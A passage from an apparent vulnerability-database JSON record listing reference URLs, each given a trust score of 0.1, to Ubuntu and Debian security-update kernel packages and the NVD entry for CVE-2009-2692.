        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-686_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-24etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2692"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-24etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-24etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-24etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch3.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-24etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-24etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-24etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-24etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-24etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-24etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-24etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-24etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-24etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.24etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-24etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-24etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-24etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-24etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-24etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-24etch3_i386.deb"
      },
      {
        "trust": 0.1,
